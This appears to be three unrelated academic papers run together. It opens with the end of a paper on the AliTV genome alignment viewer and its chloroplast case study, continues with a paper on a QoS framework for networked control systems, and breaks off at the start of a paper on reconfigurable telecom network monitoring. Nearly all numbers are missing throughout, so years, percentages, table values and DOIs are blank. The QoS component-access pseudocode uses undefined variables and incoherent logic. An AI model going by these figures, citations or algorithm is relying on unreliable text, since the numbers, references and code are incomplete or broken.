phelypaea nc_ holo-parasitic wicke et al. ( ) epifagus virginiana nc_ holo-parasitic wolfe, morden & palmer ( ) orobanche gracilis nc_ holo-parasitic wicke et al. ( ) schwalbea americana nc_ hemi-parasitic wicke et al. ( ) nicotiana tabacum nc_ non-parasitic kunnimalaiyaan & nielsen ( ) interactions to alitv. with sliders the user has the chance to specify values for link length and link identity. context menus offer direct and native interactions with the figure. to guarantee correct code functionality we engineer alitv according to the test driven development. first we write an automated test case that defines a new function. then we add the minimum amount of code to make the test pass. finally we refactor the code to accepted standards. we use jasmine . (http://jasmine.github.io/, . . ), as framework for testing our javascript code. the tests can run either via the specrunner or the command line using the taskrunner grunt . . (http://gruntjs.com/, . . ). results and discussion to demonstrate the capabilities of alitv we describe a short case study using seven published chloroplast genomes (table ). four of the chloroplasts belong to parasitic plant species and three to non-parasitic ones. parasitic plants rely much less or not at all on photosynthetic activity, a trait that should be reflected in the genomic structure of their chloroplast genomes. to assess this hypothesis the chloroplast genomes were downloaded from ncbi and processed with alitv.pl. for demonstration purposes, the chloroplast genome of nicotiana tabacum was split in two pieces to represent an unfinished genome with more than one contig, and the genome sequence of schwalbea americana was reverse-complemented (flipped). the pair-wise whole genome alignments are visualized by alitv (fig. a). the left-hand side of the display panel shows the phylogenetic tree for the seven species with species names as tip labels (parasitic plants are highlighted with an asterisk). the tree has been created provided in accordance to ncbi taxonomy (sayers et al., ). 
next to the tip labels, each genome is drawn as a scaled and annotated horizontal bar. the orientation of the s. americana genome was swapped back to match the orientation of the other genomes, indicated by the tick coordinates in reverse order ( on the right side). n. tabacum is represented by two bars as the sequence has been split into two parts. on those bars, features (e.g., genes or inverted repeats (irs)) are shown as either rectangles or arrows. alignments between adjacent genomes are represented as colored ribbons. the bottom legend shows the default color scale from red to green corresponding to low and high identity, respectively. the most striking observation is that three of the chloroplast genomes have drastically reduced sizes. all of those are parasitic (table ).
figure . whole genome alignment of seven chloroplasts visualized by alitv. species names were italicized and parasites marked with asterisks ex post. (a) default layout with a phylogenetic tree on the left-hand side and genomes represented by co-linear horizontal bars on the right; genes and inverted repeats are displayed as rectangles and arrows, respectively; colored ribbons connect corresponding regions in the alignment. (b-d) customized layouts: (b) reordered genomes, non-parasitic plants at the top and holo-parasitic plants at the bottom; (c) links filtered by identity (only those with %- % identity are drawn); (d) zoom in on a potential segmental duplication (red 'x'-shaped links) in the top four genomes.

interestingly, the chloroplast genome size of s. americana is similar to that of the non-parasitic plants. this can be explained by the life style of s. americana, which is hemi-parasitic in contrast to the other parasitic plants, which are holo-parasites. the features shown are the ir regions as arrows, the hypothetical chloroplast open reading frames (ycf) as orange and the genes of the ndh family as pink rectangles. first, it can be seen that there is a big variation in the size of the inverted repeats. while the ir of orobanche gracilis is the shortest with roughly , bp, that of s. americana is the largest with roughly , bp. second, there are fewer genes of the ndh family on cistanche phelypaea, epifagus virginiana, o. gracilis, and s. americana. members of the ndh gene family encode subunits of the nadh dehydrogenase-like complex, which is involved in chlororespiration (martín & sabater, ). however, they are not required for plant growth under optimal conditions (burrows, ). the absence of ndh genes in chloroplasts of parasitic plants has been studied in detail in wicke et al. ( ). loss of ndh genes has also been reported for photosynthetic plants such as some conifers and orchids (wakasugi et al., ; kim et al., ). looking at the pairwise similarities of adjacent genomes, it is apparent that the non-parasitic plants (e.g., olea europaea and lindenbergia philippensis) have high overall sequence identity. in contrast, the sequence similarity within parasitic plants is lower. this observation can help frame a hypothesis about the evolutionary pressure on chloroplasts of parasitic plants. another interesting observation is the distribution of missing regions of c. phelypaea in comparison to l. philippensis. missing regions are distributed all over the genome and the order of the remaining parts remains stable. wicke et al. ( ) describe an inversion in the large single copy region of s. americana compared to non-parasitic plants which is clearly visible by the link to n. tabacum around the kbp position. all these observations can be made by simply looking at the raw figure created by alitv.pl and visualized by alitv. however, the figure can be analyzed interactively in more detail. one shortcoming of the linear representation of whole genome alignments is the limited comparability of non-adjacent sequences. therefore, alitv provides a way for the user to re-order the genomes on the figure (fig. b). if reordering causes inconsistencies with the phylogenetic tree, the tree is hidden and a warning message is displayed. furthermore, the links can be filtered by their alignment identity. the default setting is to display only links with a minimal identity of %.
but sometimes it might be interesting to look at regions with less similarity. to see these regions it is also important to hide large regions with high similarity. this can be achieved by changing the identity range via a slider (fig. c). after setting the identity range to %- %, red 'x'-shaped links between n. tabacum, o. europaea, l. philippensis, and s. americana become apparent. for detailed inspection of regions of interest, alitv provides a zoom function (fig. d). this way the exact location of the alignments can be traced to the locations of psaa and psab. moreover, alitv provides functions like alignment length filtering, selective hiding of sequences, links and features, change of orientation (reverse complement) and rotation of circular chromosomes. finally, it is possible to tweak many graphical parameters, such as colors, labels or spacing, directly via the interface to produce a publication-quality figure which can be saved in svg format. furthermore, the current state can be saved in json format in order to share it with collaborators or continue the work with alitv at a later time.

conclusion

the case study demonstrates the suitability of alitv as a tool for visualizing and analyzing whole genome comparisons. alitv can be used to easily create a figure that showcases many genomic features at once. furthermore, the rich interactive features enable the exploratory analysis and discovery of previously unknown features. thus, novel hypotheses can be generated that can then be validated with experimental methods. therefore, alitv is a useful tool that will help scientists to find biologically meaningful information in the vast amount of genomic data.

acknowledgements

we would like to thank felix bemm for fruitful discussions about file formats and must-have features during the development of alitv and for supervising mja during his bachelor thesis.

additional information and declarations

funding
mja was supported by a grant of the german excellence initiative to the graduate school of life sciences, university of würzburg. the publication fee was funded by the mit libraries. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: german excellence initiative to the graduate school of life sciences, university of würzburg. mit libraries.

competing interests
the authors declare there are no competing interests.

author contributions
• markus j. ankenbrand and frank förster conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• sonja hohlfeld performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• thomas hackl conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability: github: https://github.com/alitvteam/alitv.
references

alikhan n-f, petty nk, ben zakour nl, beatson sa. . blast ring image generator (brig): simple prokaryote genome comparisons. bmc genomics : doi . / - - - .
avrani s, wurtzel o, sharon i, sorek r, lindell d. . genomic island variability facilitates prochlorococcus-virus coexistence. nature ( ): - doi . /nature .
benson da, cavanaugh m, clark k, karsch-mizrachi i, lipman dj, ostell j, sayers ew. . genbank. nucleic acids research (database issue):d -d doi . /nar/gks .
burrows pa. . identification of a functional respiratory complex in chloroplasts through analysis of tobacco mutants containing disrupted plastid ndh genes. the embo journal ( ): - doi . /emboj/ . . .
carver t, berriman m, tivey a, patel c, böhme u, barrell bg, parkhill j, rajandream m-a. . artemis and act: viewing, annotating and comparing sequences stored in a relational database. bioinformatics ( ): - doi . /bioinformatics/btn .
chin c-s, alexander dh, marks p, klammer aa, drake j, heiner c, clum a, copeland a, huddleston j, eichler ee, turner sw, korlach j. . nonhybrid, finished microbial genome assemblies from long-read smrt sequencing data. nature methods : - doi . /nmeth. .
coleman ml, sullivan mb, martiny ac, steglich c, barry k, delong ef, chisholm sw. . genomic islands and the ecology and evolution of prochlorococcus. science ( ): - doi . /science. .
corpas m, jimenez r, carbon sj, garcía a, garcia l, goldberg t, gomez j, kalderimis a, lewis se, mulvany i, pawlik a, rowland f, salazar g, schreiber f, sillitoe i, spooner wh, thanki a, villaveces jm, yachdav g, hermjakob h. . biojs: an open source standard for biological visualisation - its status in . f research : doi . /f research. - .v .
darling ace, mau b, blattner fr, perna nt. . mauve: multiple alignment of conserved genomic sequence with rearrangements. genome research ( ): - doi . /gr. .
didelot x, méric g, falush d. . impact of homologous and non-homologous recombination in the genomic evolution of escherichia coli. bmc genomics : doi . / - - - .
fischer mg. . virophages go nuclear in the marine alga bigelowiella natans. proceedings of the national academy of sciences of the united states of america ( ): - doi . /pnas. .
guy l, kultima jr, andersson sge. . genoplotr: comparative gene and genome visualization in r. bioinformatics ( ): - doi . /bioinformatics/btq .
hackl t, hedrich r, schultz j, förster f. . proovread: large-scale high-accuracy pacbio correction through iterative short read consensus. bioinformatics ( ): - doi . /bioinformatics/btu .
hallin pf, binnewies tt, ussery dw. . the genome blastatlas: a genewiz extension for visualization of whole-genome homology. molecular biosystems ( ): - doi . /b h.
harris rs. . improved pairwise alignment of genomic dna. phd thesis, pennsylvania state university.
herbig a, jäger g, battke f, nieselt k. . genomering: alignment visualization based on supergenome coordinates. bioinformatics ( ):i -i doi . /bioinformatics/bts .
kashtan n, roggensack se, rodrigue s, thompson jw, biller sj, coe a, ding h, marttinen p, malmstrom rr, stocker r, follows mj, stepanauskas r, chisholm sw. . single-cell genomics reveals hundreds of coexisting subpopulations in wild prochlorococcus. science ( ): - doi . /science. .
kim ht, kim js, moore mj, neubig km, williams nh, whitten wm, kim j-h. . seven new complete plastome sequences reveal rampant independent loss of the ndh gene family across orchids and associated instability of the inverted repeat/small single-copy region boundaries. plos one ( ):e doi . /journal.pone. .
kunnimalaiyaan m, nielsen bl. . fine mapping of replication origins (ori a and ori b) in nicotiana tabacum chloroplast dna. nucleic acids research ( ): - doi . /nar/ . . .
langille m, hsiao w, brinkman f. . evaluation of genomic island predictors using a comparative genomics approach. bmc bioinformatics : doi . / - - - .
martín m, sabater b. . plastid ndh genes in plant evolution. plant physiology and biochemistry ( ): - doi . /j.plaphy. . . .
messina r. . olea europaea chloroplast, complete genome. available at http://www.ncbi.nlm.nih.gov/nuccore/nc_ (accessed on june ).
namouchi a, didelot x, schöck u, gicquel b. . after the bottleneck: genome-wide diversification of the mycobacterium tuberculosis complex by mutation, recombination, and natural selection. genome research : - doi . /gr. . .
pagani i, liolios k, jansson j, chen i-ma, smirnova t, nosrat b, markowitz vm, kyrpides nc. . the genomes online database (gold) v. : status of genomic and metagenomic projects and their associated metadata. nucleic acids research (database issue):d -d doi . /nar/gkr .
rasko da, dale wr, sahl jw, bashir a, boisen n, scheutz f, paxinos ee, sebra r, chin c-s, iliopoulos d, klammer a, peluso p, lee l, kislyuk ao, bullard j, kasarskis a, wang s, eid j, rank d, redman jc, steyert sr, frimodt-møller j, struve c, petersen am, krogfeld ka, nataro jp, schadt ee, waldor mk. . origins of the e. coli strain causing an outbreak of hemolytic-uremic syndrome in germany. the new england journal of medicine ( ): - doi . /nejmoa .
riley dr, angiuoli sv, crabtree j, dunning hotopp jc, tettelin h. . using sybil for interactive comparative genomics of microbes on the web. bioinformatics ( ): - doi . /bioinformatics/btr .
salzberg sl, phillippy am, zimin av, puiu d, magoc t, koren s, treangen t, schatz mc, delcher al, roberts m, marcais g, pop m, yorke ja. . gage: a critical
evaluation of genome assemblies and assembly algorithms. genome research ( ): - doi . /gr. . .
sayers ew, barrett t, benson da, bryant sh, canese k, chetvernin v, church dm, dicuccio m, edgar r, federhen s, feolo m, geer ly, helmberg w, kapustin y, landsman d, lipman dj, madden tl, maglott dr, miller v, mizrachi i, ostell j, pruitt kd, schuler gd, sequeira e, sherry st, shumway m, sirotkin k, souvorov a, starchenko g, tatusova ta, wagner l, yaschenko e, ye j. . database resources of the national center for biotechnology information. nucleic acids research (database issue):d -d doi . /nar/gkn .
schwarz rf, ng cky, cooke sl, newman s, temple j, piskorz am, gale d, sayal k, murtaza m, baldwin pj, rosenfeld n, earl hm, sala e, jimenez-linan m, parkinson ca, markowetz f, brenton jd. . spatial and temporal heterogeneity in high-grade serous ovarian cancer: a phylogenetic analysis. plos medicine ( ):e doi . /journal.pmed. .
stajich je, block d, boulez k, brenner se, chervitz sa, dagdigian c, fuellen g, gilbert jgr, korf i, lapp h, lehväslaiho h, matsalla c, mungall cj, osborne bi, pocock mr, schattner p, senger m, stein ld, stupka e, wilkinson md, birney e. . the bioperl toolkit: perl modules for the life sciences. genome research ( ): - doi . /gr. .
sullivan mj, petty nk, beatson sa. . easyfig: a genome comparison visualizer. bioinformatics ( ): - doi . /bioinformatics/btr .
touchon m, rocha e. . causes of insertion sequences abundance in prokaryotic genomes. molecular biology and evolution ( ): - doi . /molbev/msm .
turnbaugh pj, ley re, hamady m, fraser-liggett cm, knight r, gordon ji. . the human microbiome project. nature ( ): - doi . /nature .
vanneste k, baele g, maere s, peer yvd. . analysis of plant genomes supports a wave of successful genome duplications in association with the cretaceous-paleogene boundary. genome research ( ): - doi . /gr. . .
wakasugi t, tsudzuki j, ito s, nakashima k, tsudzuki t, sugiura m. . loss of all ndh genes as determined by sequencing the entire chloroplast genome of the black pine pinus thunbergii. proceedings of the national academy of sciences of the united states of america ( ): - doi . /pnas. . . .
wicke s, müller kf, de pamphilis cw, quandt d, wickett nj, zhang y, renner ss, schneeweiss gm. . mechanisms of functional and physical genome reduction in photosynthetic and nonphotosynthetic parasitic plants of the broomrape family. the plant cell ( ): - doi . /tpc. . .
wolfe kh, morden cw, palmer jd. . function and evolution of a minimal plastid genome from a nonphotosynthetic parasitic plant. proceedings of the national academy of sciences of the united states of america ( ): - doi . /pnas. . . .
yahara k, didelot x, ansari m, sheppard s. . efficient inference of recombination hot regions in bacterial genomes. molecular biology and evolution ( ): - doi . /molbev/msu .
international conference on sensor network and computer engineering (icsnce )

the design of qos guarantee strategy framework for networked control system

yang weixia, school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china, e-mail: @qq.com
xu fei, wang shaochang, school of computer science and engineering, xi'an technological university, xi'an, shaanxi, china, e-mail: @qq.com, @qq.com

abstract—for basic problems of networked control systems such as packet loss and delay, this article carries out research from the perspective of network scheduling optimization. it builds a qos semantic model and a service model for networked control and puts forward a multi-level qos guarantee strategy, a qos component deployment algorithm, and a qos component access algorithm. simulation experiments on resource satisfaction and component deployment are carried out on a prototype networked control middleware system. the results show that by properly adjusting the bandwidth and priority of task nodes and controlling the efficient transmission of information, the network time delay can be shortened, the network performance improved, and the efficiency of the controller increased.

keywords: networked control; middleware; resource satisfaction; component deployment

i. introduction

the networked control system brings many advantages to the control system through network resource sharing, and introduces new challenges to the control community. the complexity of networked control systems is determined by the characteristics introduced by placing the control system on a network, such as network-induced delay, packet loss, single-packet and multi-packet data transmission, packet reordering, and network scheduling problems, which this article calls "web services digital constraints" [ ]. networked control applications require the use of heterogeneous, diverse resources; in general these resources are shared, which requires collaboration between the various tasks and makes resource scheduling and task execution complicated. the current network infrastructure is based on a "best effort" basis, so quality of service is not fully guaranteed, and when multiple services use resources collaboratively, performance and efficiency can easily drop. addressing these issues requires the introduction of a qos mechanism. ian foster and other scholars have proposed a qos framework based on the globus toolkit -- the globus architecture for reservation and allocation, gara [ ][ ], which provides end-to-end qos guarantees for the middleware core layer and the service layer. gara uses gram for resource management, defines a generic description mechanism for all kinds of heterogeneous resources and provides a unified control interface, but it lacks extensibility and its implementation architecture cannot be applied to general networked control requirements. professor rashid at cardiff university proposed the qos management framework g-qosm [ ], which uses qos information for resource registration, discovery and selection, reserves and allocates resources, and adaptively adjusts task scheduling; however, the framework completely lacks qos semantic modeling ability and cannot adapt well to changes in the business environment. zeng et al. [ ][ ] proposed service composition middleware based on maximization of user satisfaction, and gave two strategies for local task-level service selection and global collaborative allocation.
local service selection uses two steps, metrics and weighting, to measure services over multidimensional qos attributes. the literature [ ] points out that heterogeneous network environments require a requirement-definition scheme based on so-called elastic constraints; the multi-objective problem is modeled as a multiple-choice knapsack problem and solved with a dynamic programming algorithm under dynamic constraints, but it is difficult to clearly determine the customers' application needs. s. shakkottai et al. [ ], in research on ad hoc wireless self-organizing networks, put forward the idea of "cross-layer design": while comprehensively considering the relationships between the layers of the protocol stack and retaining the original layered protocol stack structure, it breaks the limits on communication between the middle layers of the tcp/ip network hierarchy and supplements and designs a new type of network protocol stack that allows interaction between the layers of the communication protocol stack. yi-lin chang and others at xi'an university of electronic science and technology [ ], on the basis of the typical five-layer network architecture, proposed the concept of "cross-layer perception" in cross-layer design, extending the idea of cross-layer design to the de facto standard five-level network model. most current network protocol implementations provide only partial qos functionality. networked control systems run over these basic network services; simple network qos mechanisms can hardly guarantee their qos requirements, and the existing qos guarantee strategies are based on a "best effort" service mechanism and cannot provide component-oriented middleware platform support. this article first analyzes the context factors of the networked control environment, builds a qos-based semantic model for real-time systems, reconstructs the hierarchical structure of networked control system service quality and establishes the corresponding management model; by extending the object management group interface definition language, the established qos management model is integrated into the kernel of the middleware services, and a domain-oriented control service qos management framework is constructed; finally, simulation experiments verify the effectiveness of the qos management mechanism. the structure of this paper is as follows: section introduces the qos semantic model and qos service model for network-oriented control; section introduces the qos scheduling framework design; section introduces the qos component access algorithm and qos component deployment algorithm; section carries out the simulation experiment to verify the above strategy framework and the effectiveness of the algorithms.

ii. qos semantic model

this section presents a qos semantic model. its purpose is to establish an open, extensible model for qos definition, data exchange, and interoperation, in which changes to qos parameters, qos management levels, and qos management mechanisms do not force fundamental changes to the presentation logic; the presentation logic and the processing logic are decoupled so as to better adapt to the various business requirements of networked control systems. the semantic model is composed of the qos model and the qos management model.

a. the metamodel
the qos metamodel defines the atomic data structures required by the qos representation system. it plays a basic structural role in the qos representation system, not only enhancing the rigor of the qos representation but also laying the foundation for extending qos definitions. the qos metamodel representation system is shown in the figure below.

figure . qos meta model structure

- modelelement is the root element of the inheritance hierarchy in the metamodel, which is the most basic abstract building block.
- identifier is the string by which a model element identifies itself; it is unique in the entire namespace.
- category: an abstract building block used to derive data types and class objects. it is an aggregation of methods and properties.
- datatype defines the basic data types used to describe qos, constructed data types, template data types, and custom data types.
- class: an abstraction of a collection of objects with the same behavior, attributes, relationships, and semantics.
- schema: a framework consisting of one or more classes.
- qualifier is the specification and constraint of elements such as a class, an attribute, and its schema.
- event can be located in time and space and can take place with practical significance.
- rule is a policy used to indicate a class's state migration when an event occurs.

b. qos management model

the control application is a set of application artifacts with qos characteristics. a component instance is the physical unit deployed and instantiated in the component framework; at runtime a component instance can be represented as a process, thread, or other autonomous running unit in the component container environment. an application configuration graph, which is called a qos component graph, is made up of abstract component instances.

figure . qos semantic component application configuration diagram

a directed edge runs from one component instance to another, where the output of the former is the input of the latter. the qos feature of a component is described as follows:

qos_component = (qos_demand, qos_provide, res)
qos_demand = [q_1^dem, q_2^dem, ..., q_m^dem], q_i^dem ∈ double, i = 1, 2, ..., m
res = [q_1^res, q_2^res, ..., q_k^res], q_i^res ∈ double, i = 1, 2, ..., k
qos_provide = [q_1^pro, q_2^pro, ..., q_n^pro], q_i^pro ∈ double, i = 1, 2, ..., n

in the above equations, all qos attribute values are of real type; qos_provide and qos_demand are the lists of qos attributes provided and required by the component instance, respectively, and res is the list of system resources occupied by the component instance at runtime, which is provided by the system resource management service.

iii. qos strategy framework

a. frame structure

this section presents a strategy framework based on qos monitoring and safeguard mechanisms. it runs the core components of the qos framework, not only providing performance guarantees for resource service management and the operation of the communication network, but also dynamically monitoring qos parameters at runtime and providing qos strategy execution. resource services state their requirements on the performance of the communication network; these requirements are mapped to communication network qos standards, and appropriate protocols in the communication network and qos strategies for resource management are used to provide satisfactory data transmission performance for the services.
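for illustration only, the component qos descriptor introduced in section ii.b above (demand, provide, and occupied resources as lists of real values) can be held in a small data structure; the python sketch below uses names of our own choosing and is not the authors' implementation.

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class QosComponent:
    """Illustrative container for the (qos_demand, qos_provide, res) triple."""
    qos_demand: List[float] = field(default_factory=list)   # q_i^dem: required attributes
    qos_provide: List[float] = field(default_factory=list)  # q_i^pro: provided attributes
    res: List[float] = field(default_factory=list)          # q_i^res: occupied resources

def satisfies(provider: QosComponent, consumer: QosComponent) -> bool:
    """Check pairwise that provided attribute values cover the demanded ones.
    (An assumption about how adjacent component instances are matched.)"""
    if len(provider.qos_provide) != len(consumer.qos_demand):
        return False
    return all(p >= d for p, d in zip(provider.qos_provide, consumer.qos_demand))
```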
the framework is shown in the figure below.

figure . qos management framework

b. qos requirements mapping mechanism

to be able to provide effective qos support for control applications, one must be able to derive clear qos requirements from the user's expectations. here, the concept of a group of work (gow) is presented, representing the minimum unit of working granularity that can be processed by the resource service. an application can usually consist of several working groups, each of which can be processed by the resource service according to the corresponding qos parameters. the process of extracting explicit qos characteristics and requirements from the control application is shown in the figure below.

figure . qos requirements mapping process

the process of extracting the gows from the application and classifying them by qos is as follows:

ncsapp = {g_1, g_2, ..., g_n}, g_i = {q_1^i, q_2^i, ..., q_e^i}

where ncsapp represents a networked control application, g_i represents a gow, and q_f^j represents a qos feature. when gows are classified according to their qos characteristics, qos requirement parameters can be extracted from an application; the user can then negotiate with other partners according to these qos parameters to jointly determine the qos level on which the application is completed. the specific scheduling of resource services is performed in the middle tier, so the process can be seen as an implementation of the qos mapping from the application-layer business abstraction to the middle tier.

c. qos component access algorithm

the problem of component access can be described as follows: ( ) the function configuration diagram of the composite component request is mapped to the corresponding component instances; ( ) according to the service qos requests and the system resource conditions, a specific qos profile is chosen for each component instance so that the satisfaction relation between adjacent component instances can be established and the resources required by all component instances can be met. in the following figure, an example of a qos component function configuration diagram and qos diagram is given, together with the process of the component instance access algorithm.

figure . the service component combination process

for component-based service composition, a qos profile must first be chosen for each component instance so that a satisfaction relationship is formed between adjacent component instances; the service qos diagram qg is constructed according to the component function configuration diagram cg and the qos specifications of the components. the specific algorithm flow is as follows:

algorithm : heuristic component access algorithm.
input: component function configuration diagram and the collection of currently available system resources.
output: optional qos component configuration set -- configset[]
a) initialize the edge[n] array with each edge of the function configuration diagram (cg);
b) find all source nodes and target nodes in edge[n] and place them in the arrays startpt[] and endpt[];
c) foreach u in startpt
d)   visited[u] = false;
e) foreach w in endpt
f)   visited[w] = false;
g) configset = ∅;
h) foreach u in startpt
i)   qc_tmp = ∅;
j)   if visited[u] == false
k)   then call construct(u, qc_tmp);
l) procedure construct(u, qc)
m) {
n)   visited[u] = true;
o)   foreach qm_i in qosprofile[u] {
p)     qc_item = ∅;
q)     foreach q_t in qm_i {
r)       if (all_satisfied == true) {
s)         q_satisfied = false;
t)         foreach qm_j in qosprofile[v] {
u)           if (satisfied(q_t) == true)
v)             qc_item = qc_item ∪ {qm_j};
w)             q_satisfied = true;
x)         }
y)       }
z)     }
aa)    if (u ∈ startpt[]) {
bb)      qc = qc ∪ qc_item; }
cc)    else if (u ∉ startpt) {
dd)      foreach item in qc {
ee)        if (qm_i ∈ item)
ff)          qc = qc ∪ qc_item;
gg)      }
hh)    }
ii)    foreach v in endpt[] {
jj)      construct(v, qc);
kk)    }
ll) }

first, the function configuration diagram of the component is initialized, and the source and target nodes of the graph are placed into the corresponding data structures, with the temporary configuration set empty; then the heuristic configuration-set generation function is called for each source node; in this function, for each qos configuration item, it is checked whether the qos attributes are satisfied by the component instance and, if so, whether the component instance of the destination node also satisfies the qos configuration item; the method recurses until every feasible qos configuration item has been processed and the result is output.

iv. simulation experiment

in this section, the simulation experiment is used to verify the core algorithm of the qos management framework and the related hierarchical strategy design.

definition : qos requirements meeting rate (qrmr). assuming that among all service application requests, request_success service applications are successful, the qos demand satisfaction rate is defined as:

qrmr = request_success / request_total

the simulation experiment of this paper compares the qrmr of different component selection algorithms, as shown in fig. . the simulation experiment environment consists of four pcs networked with the qos component container.

figure . qos simulation environment network structure

in the qos simulation environment it is assumed that the factors influencing qrmr are the resource constraints and the service resource requirements. in the simulation experiment, a composite service request is created randomly every  seconds; the function configuration diagrams of the four simulated composite services and the deployment of the service components are shown in figure , and the calculated resource requirements of the feasible qos configurations are shown in table .

figure . the simulation experiment component function configuration diagram

in the experiment, the qos components perform reservation management only for cpu resources.

table .
the composite services' feasible qos configurations and their resource requirements. the table lists, for each service mark (qm , qm , ..., qm ), the cpu percentages required by its feasible qos configurations.

statistics of the system's qrmr are collected every  seconds. the duration of each successful service is set in seconds, and when the service is completed, its resources are reclaimed by the corresponding qos component resource management meta-service. in the experiments, the capacities of resources r , r , r , and r are set to %. in the component access algorithm, the weights of resources r , r , r , and r are set to . , . , . , and . , respectively.

figure . qrmr of the different component access algorithms

in the simulation, the optimal solution used by the negotiation algorithm is obtained by exhaustively solving the integer programming problem. figure shows how the qrmr changes over time. it can be seen from the experimental results that at the beginning of the simulation both algorithms achieve a high success rate, but as the simulation proceeds, the qrmr of the heuristic component access algorithm stays around . , higher than that of the basic component selection algorithm. the results show that qrmr can be improved by heuristically adjusting the resource weights and by negotiating service resources.

v. conclusion

this paper first introduces the basic qos requirements of networked control systems and presents an open and scalable qos semantic model whose constituent elements include qos contracts, qos parameters, qos models, and qos specifications, giving service components the ability to adapt to network resources. based on an analysis of the qos attributes of service components, the process of establishing component services is described and a dynamic algorithm for component service composition is proposed. at the same time, qos strategies are designed for the application layer, the middle layer, the resource layer, and the network layer; finally, a simulation experiment on the deployment of dynamic service components in containers based on resource distribution is designed, and the effectiveness of the proposed qos goal-driven dynamic deployment algorithm is verified.

references

[ ] xu fei, liu mingyong, li wenbai, lei xiaokang. study on the digital redesign of robust controllers for parametric uncertainty systems [j]. systems engineering and electronic technology, , : - .
[ ] i.t. foster, c. kesselman, c. lee et al. a distributed resource management architecture that supports advance reservation and co-allocation [a]. in: proceedings of the seventh international workshop on quality of service [c], london, uk, : - .
[ ] poza-lujan jose-luis, posadas-yagüe juan-luis. distributed sensor architecture for intelligent control that supports quality of control and quality of service. sensors (switzerland), ( ), : - .
[ ] r. j. al-ali, k. amin, g. v. laszewski et al. an ogsa-based quality of service framework [j]. lecture notes in computer science, , : - .
[ ] hakiri akram, berthou pascal. supporting sip-based end-to-end data distribution service qos in wans. journal of systems and software, ( ): - .
[ ] l. z. zeng, b. benatallah, a. h. h. ngu et al. qos-aware middleware for web services composition [j]. ieee transactions on software engineering, , ( ): - .
[ ] m. wieczorek, s. podlipnig, r. prodan et al. bi-criteria scheduling of scientific workflows for the grid [a]. in: proceedings of the th international symposium on cluster computing and the grid (ccgrid ) [c], lyon, france: ieee computer society, : - .
[ ] shakkottai s, rappaport t, karlsson p. cross-layer design for wireless networks. ieee communications magazine, , ( ): - .
[ ] a study on the movement and distribution of nodes with multiple entry and exit regions. computer research and development, , ( ): - .

submitted january, accepted july, published august. corresponding author man tianxing, mantx @gmail.com. academic editor shlomi dolev. additional information and declarations can be found on page . doi . /peerj-cs. copyright tianxing et al., distributed under creative commons cc-by. open access.

reconfigurable monitoring for telecommunication networks

man tianxing, vasiliy yurievich osipov, alexander ivanovich vodyaho, andrey kalmatskiy, natalia alexandrovna zhukova, sergey vyacheslavovich lebedev and yulia alexandrovna shichkina
itmo university, saint petersburg, russia; saint-petersburg institute for informatics and automation of the russian academy of sciences, saint petersburg, russia; st. petersburg state electrotechnical university, saint petersburg, russia; google, new york, ny, united states of america

abstract

this article addresses the monitoring problem of telecommunication networks. we consider these networks as multilevel dynamic objects. it is shown that reconfigurable systems are necessary for their monitoring in real life. we implement the reconfiguration abilities of the systems through the synthesis of monitoring programs and their execution in the monitoring systems and on the end-user devices. this article presents a new method for the synthesis of monitoring programs and develops a new language to describe the monitoring programs. the programs are translated into binary format and executed by the virtual machines installed on the elements of the networks. finally, we present an example of program synthesis for the monitoring of real distributed networks.

subjects: adaptive and self-organizing systems, agents and multi-agent systems, computer networks and communications
keywords: monitoring system, complex object model, abstract machine, telecommunication network

introduction

nowadays, the success of human activity in many areas largely depends on the efficiency of the functioning of telecommunication networks. telecommunication networks today are used in a variety of fields of human activity. thus, the use of radar and radar-optical data to solve a massive class of problems in the fields of transport, agriculture, classification of area and point objects, monitoring of anthropogenic activities, and other tasks seems to be extremely promising. at least a dozen new radar satellites are planned to be launched in the coming years, and all cars today are equipped with radar. the intelligent processing of this data requires the use of edge and cloud computing, which entails new challenges for telecommunication network design.
damage or incorrect operation of such networks can be a reason for severe losses. so, it is necessary to have adequate tools and methods for maintaining such networks. this can be done through permanent monitoring. monitoring ensures safe operation and quick detection and prevention of network failures. many factors cause changes in the structure, the state, and the behavior of the networks. thus, there is a need to reconfigure monitoring processes. reconfigurable monitoring processes should allow us to gather data about dynamic telecommunication networks and process it according to the current state of these networks and estimations of their expected use. in telecommunication networks, the objects of monitoring are the numerous technical devices of end-users. sets of parameters characterize the state of the objects and their elements. centralized and decentralized schemes for object monitoring are used. centralized schemes assume that monitoring systems gather data from objects. also, data can be gathered by the objects and transferred to the monitoring systems. in both schemes, predefined processes are commonly used. gathering all possible data leads to a significant increase in network traffic. when data is only partially collected, failures of the objects cannot be detected quickly and their reasons cannot be identified. for the reconfiguration of monitoring processes, business rules can be used. the rules define process behavior for different known situations. this approach is well applicable for monitoring when networks have permanent structures and permanent conditions of use. the problem of monitoring dynamic networks remains unsolved. to solve the problem, monitoring systems must have the ability to build and rebuild the monitoring processes dynamically. in this article, we propose a new method for building monitoring processes based on the theory of synthesis. to execute the processes, a new language and a new virtual machine (vm) are developed. the rest of the article is structured as follows. in the second section, the capabilities of the existing monitoring systems are analyzed. it is shown that for dynamic telecommunication networks reconfigurable systems have not been considered until now. then we describe monitoring processes and propose new models for monitoring programs and the method for their synthesis that allow developing reconfigurable monitoring systems. in the fourth section we present the implementation of the proposed method, which contains the description of the language for monitoring programs, a compiler for the language, and a virtual machine that is capable of executing the compiled monitoring programs on end-user devices. in the fifth section, a case study is given to prove the effectiveness of the method. the last section is the conclusion.
materials & methods

related work

